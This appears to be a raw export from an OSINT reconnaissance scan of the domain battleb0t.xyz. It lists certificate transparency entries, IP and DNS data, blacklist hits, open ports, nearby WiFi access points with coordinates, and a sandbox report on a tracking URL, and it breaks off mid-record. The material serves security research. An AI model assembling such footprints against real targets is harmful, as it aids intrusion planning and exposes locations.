| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 02:54:20 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | funny.battleb0t.xyz |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | fluid.battleb0t.xyz |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0066cc.github.io | 185.199.111.153 |
| 2023-05-12 02:54:17 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5e062258aa2252-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3037::6815:470e |
| 2023-05-12 02:50:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 3 | 0 | None | Honeypotproject (104.21.71.14): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 104.21.71.14 |
| 2023-05-12 03:00:58 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.97): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | JWNK (Net ID: 00:14:5C:88:0D:74) | 50.8897, 6.0563 |
| 2023-05-12 03:23:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.12:443 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo61714 (Net ID: 00:0C:F6:59:F1:12) | 50.8897, 6.0563 |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 3 | 0 | 3 | 0 | None | http://code.jquery.com/jquery-3.2.1.js | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:46:55 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:cd:b7:3c:d6:71:f3:4f:d0:0b:1c:3a:89:f9:32:41:9b:99
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:22:44 2022 GMT
Not After : Feb 15 13:22:43 2023 GMT
Subject: CN=www.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:bd:87:9d:fd:0d:e7:91:1c:82:de:38:55:01:b8:
01:a4:4f:91:68:f2:b6:41:bd:96:b7:21:f2:a0:55:
3b:8f:fb:94:98:1c:4d:61:0a:0d:49:1e:41:02:01:
75:0f:0f:e7:3e:9d:a4:2e:1d:07:1e:23:ae:57:ed:
a8:d0:66:39:2d:83:68:be:6e:6f:58:41:0a:9a:c5:
3e:12:87:89:8c:60:e5:de:67:7a:e4:46:2e:7b:08:
ed:c2:60:17:80:e6:b4:45:ca:55:4c:b4:aa:5a:0e:
21:b2:65:97:04:7d:42:9a:78:70:55:51:b1:3b:c5:
d3:0d:ce:41:3b:0f:13:16:72:ef:e1:6f:39:c8:fd:
4b:2d:7e:9e:b0:41:fd:9c:7c:61:84:dd:e4:70:a7:
c5:c7:ec:ba:20:9f:a0:1f:9c:1c:14:59:c8:6c:6b:
82:ec:5e:ff:5a:3a:74:2a:f6:b9:fb:b1:ab:97:21:
90:d8:cd:5c:36:36:0e:73:80:7f:e4:4a:7c:cd:5d:
9a:1e:e6:d5:29:40:7a:8c:74:6b:33:02:0d:4e:19:
f0:00:4b:c5:69:8a:06:03:20:76:15:a8:c2:2f:17:
7a:d2:cd:b7:58:14:91:a2:f2:64:cf:8f:82:14:81:
ba:d6:41:8b:94:86:36:f5:f5:da:76:a8:04:5b:ad:
f0:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
57:48:2A:D8:70:70:AC:E4:0A:F6:8C:02:EF:80:5A:28:2D:B1:3C:AE
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
36:fd:c3:ee:77:8a:70:b0:4d:2d:e7:2a:5c:5f:4d:da:b4:a1:
e2:01:81:ed:f5:51:9e:99:02:16:e3:a3:0b:1f:75:93:c8:5e:
b9:d7:f5:17:db:c5:b5:da:58:15:fd:4b:36:d5:4d:d6:5d:2b:
4f:49:fe:17:38:11:d4:b2:eb:07:49:19:e3:43:16:4c:57:7c:
97:e9:db:e2:60:b9:08:77:50:48:9b:b0:17:ef:9d:09:42:2e:
2c:30:28:d5:83:ed:da:76:33:41:0d:5b:41:19:c5:b8:7f:74:
cf:bd:8b:ac:7e:2d:b1:2d:d2:aa:05:f2:50:61:9c:8f:16:2d:
59:13:65:6c:9c:0b:8f:2b:a9:e1:4d:ad:99:3c:ae:24:73:55:
9d:81:3b:f1:9e:69:4c:61:66:fb:26:19:5a:2f:78:df:76:be:
4f:90:40:ce:71:fc:d7:53:04:9e:03:82:87:39:e3:ba:6f:94:
e1:23:1d:69:45:b3:a4:42:55:02:7e:d3:af:be:34:75:9f:16:
a6:29:8b:66:c6:ca:4a:93:de:4b:14:90:c7:14:68:7f:9c:0a:
30:11:89:14:58:e3:55:39:f0:a4:c6:80:42:fc:39:c9:c9:40:
ba:10:84:83:2d:87:52:29:63:ea:37:f2:50:8b:de:a9:ff:9e:
bc:f4:cc:e6
| battleb0t.xyz |
| 2023-05-12 03:34:02 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
A`qRWQ
@Qh9'
WYW`Q
6:E<0s
qt2!X
O"Np
/Z9l6
23W4R
p$ke'V
sZSjUQ
S\-up
iTb.T
IDAT?
ZYjy9
k-<Z6
DRZ1s
NLgiN
7jI\k
q8cH$
cG$C:
70/1c
Zmfdc2
FC1Qh
IDATU
aEPq<aF
yPbDap
@j518b
.!5Cw
epCrZ
nYy\o
F'Tjms
s2OUvm
wfD/fG
o-\kY
gGtIx9
t?T x
`q\41
r`qOp
/. rqS
hTKCz
bkV_n
aU9zH
svPOI
LwXr3
L?3t1
V'DYE
78AHzS
h7YIvh-
Xg:5B
jAQY3
<Eh_-
ZJvh1
Q`6Vh
xk1ao
6xyMC
YGH2f?
PbtsQ
vu11h
Ip@ \
x0Er-
ZIuZM<F
HDBs!
D$r"r"r
5e8YW
hd@87
3\-:9
L!sA6z
l ?K8'
Z\1hp
?JWEG5
N@1$!EHq
4 1Qb
IDATae
KJ:. -:.
XWU:\Us
0:HB8
0>>7c
MU0t5
RtVTMT
ktCtE
T1SffT
DoV:LLN
Ey8UQ
xsqO7
DtOJoJ
k Q:1
RS-.7
Ty NW
le1NU
Qt@tBr
3 "B"q
B8!u`
BGt4:
PiZEOK
1VuEE
V2xqwbH
IDAT/v
?KwP0TA
jO/Ty | https://funny.battleb0t.xyz/images/carti_2.PNG |
| 2023-05-12 03:24:22 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA | https://ayhu.xyz/ |
| 2023-05-12 02:53:41 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url1021.joinpreventor.com/ls/click?upn=bna4-2BmY1ITDZjl0PQKir67uPPI2f2DxWOATqx3-2Fj7OYylB8Hflza-2F4c-2BTJ51THm64bMitYJMpTuBxoVK0JwiPA-3D-3DpyHG_2XvlAmvoAz3TtepUWzZ-2Fg6Vtpb0zElD-2BU8dA0uWhdmvWpUzFQRCBLPcsU5at7iOPzNbZzyRCb5bSh-2BoMMyAUQdyJp9IV2xfegy0-2FMwvEi-2BwozwcLtcNHqHaMRs8zAm7v5oZ8wTMu7PUckSXiY1wEtthrMiHMmlt1SKTk4hf2iioRh3-2B86BVSrTZJJ2g6sue3eW6I57lqbc2bcdpC-2Bp22gAow8TiD5sSYFOCPPeJl4SEjho6CtTHi1SkbZeCNjuDVaCHb7ZN7pl7M8J4fMd6cYgTzAMer0zWo7ptC-2FaDcdGyQ5alZBCdDDYj-2BhHCJI3n5O7QbBOTHbEW4BPzmKn4frv1-2FDXuZomKHcSKPoCB6HeEWrY9Qr5sgHr-2BneuGSXpzCfRF8yt-2FeaaoqJDE-2B2ngu0d2quGV2vB4dMuXQiRsmUpk-3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b60_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b60_IESQMMUTEX_0_331"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2912"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b60_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b60_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_b60_IE_EarlyTabStart_0xa2c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b60_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.120:80"\n "52.25.204.60:443"\n "13.227.74.22:443"\n "142.250.191.74:443"\n "18.205.222.128:443"\n "185.199.109.153:443"\n "13.227.21.217:443"\n "142.250.191.42:443"\n "13.227.74.93:443"\n "157.240.22.25:443"\n "136.143.191.67:443"\n "142.250.189.163:443"\n "13.227.74.48:443"\n "91.199.212.52:80"\n "204.141.43.48:443"\n "136.143.191.144:443"\n "136.143.190.97:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url1021.joinpreventor.com"\n "crt.usertrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "connect.facebook.net"\n "crt.usertrust.com"\n "css.zohocdn.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "js.zohocdn.com"\n "maciejsawicki.com"\n "preventor.com"\n "salesiq.zoho.com"\n "salesiq.zohopublic.com"\n "script.hotjar.com"\n "static.hotjar.com"\n "uploads-ssl.webflow.com"\n "url1021.joinpreventor.com"\n "vts.zohopublic.com"\n "www.bugherd.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"src="https://www.facebook.com/tr?id=2116198561850213&ev=PageView" (Indicator: "facebook.com"), "</style><meta name="twitter:card" content="summary" />" (Indicator: "twitter"), "<meta name="twitter:site" content="@Preventorft" />" (Indicator: "twitter"), "{state:0\ntransportUrl:b\ncontext:c\nparent:Wk()}\nP(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ja+"&cx=c";Tr()&&(f+="&sign="+Jh.Xe);var g=Sh||ci?Sr(b,f):void 0;g||(g=Fo("https://","http://",Jh.ze+f));Qk().destination[a]={state:1\ncontext:c\nparent:Wk()};mc(g)}};function Ur(){if(Ok()){return!0}return!1};var Xr=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/)\nYr={cl:["ecl"]\ncustomPixels:["nonGooglePixels"]\necl:["cl"]\nehl:["hl"]\nhl:["ehl"]\nhtml:["customScripts"\n"customPixels"\n"nonGooglePixels"\n"nonGoogleScripts"\n"nonGoogleIframes"]\ncustomScripts:["html"\n"customPixels"\n"nonGooglePixels"\n"nonGoogleScripts"\n"nonGoogleIframes"]\nnonGooglePixels:[]\nnonGoogleScripts:["nonGooglePixels"]\nnonGoogleIframes:["nonGooglePixels"]}\nZr={cl:["ecl"]\ncustomPixels:["customScripts"\n"html"]\n" (Indicator: "youtube"), "var Jv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0\nf=0;return{createEvent:function(g,h,m){var n=a()\np=n.Lg\nq=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Lg*h):Math.round(n.Pi)\nr=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100)\nt=G.hidden?!1:.5<=Pi(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=lv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube"), "b\n"vert.pix");break;case "PERCENT":qy(d.verticalThresholds,b,"vert.pct")}pv("sdl","init",!1)?pv("sdl","pending",!1)||I(function(){return ry()}):(nv("sdl","init",!0)\nnv("sdl","pending",!0)\nI(function(){ry();if(sy()){var e=ty();qc(z,"scroll",e);qc(z,"resize",e)}else nv("sdl","init",!1)}));return b}xy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"])\nyy=["www.youtube.com"\n"www.youtube-nocookie.com"]\nzy\nAy=!1;" (Indicator: "youtube"), "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gg:d\nEg:e\nFg:f\nlh:g\nmh:h\nWd:m\nib:b}\np=z.YT\nq=function(){Gy(n)};if(p)return p.ready&&p.ready(q)\nb;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=G.getElementsByTagName("script")\nu=t.length\nv=0;v<u;v++){var w=t[v].getAttribute("src");if(Jy(w,"iframe_api")||Jy(w,"player_api"))return b}for(var x=G.getElementsByTagName("iframe")\ny=x.length\nA=0;A<y;A++)if(!Ay&&Hy(x[A],n.Wd))return mc("https://www.youtube.com/iframe_api")\n" (Indicator: "youtube"), "Ay=!0\nb});return b}Ky.N="internal.enableAutoEventOnYouTubeActivity";var Ly;function My(a){var b=!1;return b}My.N="internal.evaluateMatchingRules";" (Indicator: "youtube"), "GET /5f774172772fc1fb1fa10c12/5f774173a2f6f80a3d80d3be_twitter.png HTTP/1.1Accept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip\n deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "twitter"), "GET /5f774172772fc1fb1fa10c12/606cb3a9126777b98ff68805_icon-youtube.png HTTP/1.1Accept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like 